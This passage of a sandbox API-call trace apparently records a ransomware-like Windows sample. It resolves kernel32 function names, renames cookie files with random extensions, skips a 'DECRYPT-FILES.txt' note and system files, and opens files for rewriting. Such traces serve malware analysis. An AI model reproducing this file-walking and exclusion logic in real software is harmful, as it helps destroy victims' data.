lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0181.058] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0181.058] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0181.058] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0181.058] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0181.058] lstrlenA (lpString="CREATEPIPE") returned 10 [0181.058] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0181.058] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0181.058] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0181.058] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0181.059] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0181.059] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0181.059] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0181.059] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0181.059] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0181.059] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0181.059] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0181.059] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0181.059] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0181.059] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0181.059] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0181.059] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0181.059] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0181.059] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0181.059] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0181.059] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0181.059] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0181.059] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0181.059] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0181.059] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0181.059] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0181.059] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0181.059] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0181.059] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0181.059] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0181.059] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0181.059] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0181.059] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0181.059] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0181.059] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0181.059] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0181.059] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0181.059] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0181.059] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0181.059] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0181.059] lstrlenA (lpString="CREATETHREAD") returned 12 [0181.059] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0181.060] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0181.060] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0181.060] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0181.060] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0181.060] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0181.060] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0181.060] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0181.060] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0181.060] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0181.060] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0181.060] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0181.060] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0181.060] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0181.060] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0181.060] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0181.060] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0181.060] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0181.060] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0181.060] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0181.060] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0181.060] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0181.060] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0181.060] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0181.060] lstrcpyA (in: lpString1=0x36fce30, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0181.060] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0181.060] lstrcpyA (in: lpString1=0x36fce30, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0181.060] lstrlenA (lpString="CTRLROUTINE") returned 11 [0181.060] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0181.060] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0181.060] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0181.060] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0181.060] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0181.060] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0181.060] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0181.060] lstrlenA (lpString="DEBUGBREAK") returned 10 [0181.060] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0181.060] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0181.061] lstrcpyA (in: lpString1=0x36fce30, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0181.061] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0181.061] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0181.061] lstrlenA (lpString="DECODEPOINTER") returned 13 [0181.061] lstrcpyA (in: lpString1=0x36fce30, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0181.061] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0181.061] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0181.061] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0181.061] lstrcpyA (in: lpString1=0x36fce30, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0181.061] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0181.061] lstrcpyA (in: lpString1=0x36fce30, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0181.061] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0181.061] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0181.061] lstrlenA (lpString="DELETEATOM") returned 10 [0181.061] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0181.061] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0181.061] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0181.061] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0181.061] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0181.061] lstrlenA (lpString="DELETEFIBER") returned 11 [0181.061] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0181.061] lstrlenA (lpString="DELETEFILEA") returned 11 [0181.061] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0181.061] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0181.061] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0181.061] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0181.061] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0181.061] lstrlenA (lpString="DELETEFILEW") returned 11 [0181.061] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0181.061] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0181.061] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0181.061] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0181.061] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0181.061] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0181.061] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0181.061] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0181.061] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0181.061] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0181.061] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0181.062] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0181.062] lstrcpyA (in: lpString1=0x36fce30, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0181.062] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0181.062] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0181.062] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0181.062] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0181.062] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0181.062] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0181.062] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0181.062] lstrcpyA (in: lpString1=0x36fce30, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0181.062] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0181.062] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0181.062] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0181.062] lstrcpyA (in: lpString1=0x36fce30, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0181.062] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0181.062] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0181.062] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0181.062] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0181.062] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0181.062] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0181.062] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0181.062] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0181.062] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0181.062] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0181.062] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0181.062] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0181.062] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0181.062] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0181.062] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0181.062] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0181.062] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0181.062] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0181.062] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0181.062] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0181.062] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0181.062] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0181.063] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0181.063] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0181.063] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0181.063] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0181.063] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0181.063] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0181.063] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0181.063] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0181.063] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0181.063] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0181.063] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0181.063] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0181.063] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0181.063] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0181.063] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0181.063] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0181.063] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0181.063] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0181.063] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0181.063] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0181.063] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0181.063] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR") returned 112 [0181.063] wsprintfW (in: param_1=0x36fdae8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR.1GUTrk") returned 119 [0181.063] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.0vgwyr"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.0VgwYR.1GUTrk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt.0vgwyr.1gutrk"), dwFlags=0x0) returned 1 [0181.064] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.064] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.064] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.065] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1e5e64f0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1e5e64f0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xab469c00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x2a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shWjMa", cAlternateFileName="5P5NRG~1.SHW")) returned 1 [0181.065] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shWjMa", lpString2="DECRYPT-FILES.txt") returned -1 [0181.065] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shWjMa", lpString2="autorun.inf") returned -1 [0181.065] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shWjMa", lpString2="boot.ini") returned -1 [0181.065] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shWjMa", lpString2="desktop.ini") returned -1 [0181.065] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shWjMa", lpString2="ntuser.dat") returned -1 [0181.065] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shWjMa", lpString2="iconcache.db") returned -1 [0181.065] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shWjMa", lpString2="bootsect.bak") returned -1 [0181.065] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shWjMa", lpString2="ntuser.dat.log") returned -1 [0181.065] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shWjMa", lpString2="thumbs.db") returned -1 [0181.065] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shWjMa", lpString2="Bootfont.bin") returned -1 [0181.065] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shWjMa") returned 40 [0181.065] lstrcmpiW (lpString1="shWjMa", lpString2="lnk") returned 1 [0181.065] lstrcmpiW (lpString1="shWjMa", lpString2="exe") returned 1 [0181.065] lstrcmpiW (lpString1="shWjMa", lpString2="sys") returned -1 [0181.065] lstrcmpiW (lpString1="shWjMa", lpString2="dll") returned 1 [0181.065] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0181.065] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shWjMa") returned 40 [0181.065] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0181.065] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shWjMa" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shWjMa") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shWjMa" [0181.065] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.065] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shWjMa" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt.shwjma"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0181.066] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=678) returned 1 [0181.066] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0181.066] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.067] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.067] CloseHandle (hObject=0x280) returned 1 [0181.067] CloseHandle (hObject=0x27c) returned 1 [0181.067] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.068] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab2548c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab2548c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab2548c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0181.068] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0181.068] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xee57fb60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0181.068] lstrcmpiW (lpString1="index.dat", lpString2="DECRYPT-FILES.txt") returned 1 [0181.068] lstrcmpiW (lpString1="index.dat", lpString2="autorun.inf") returned 1 [0181.068] lstrcmpiW 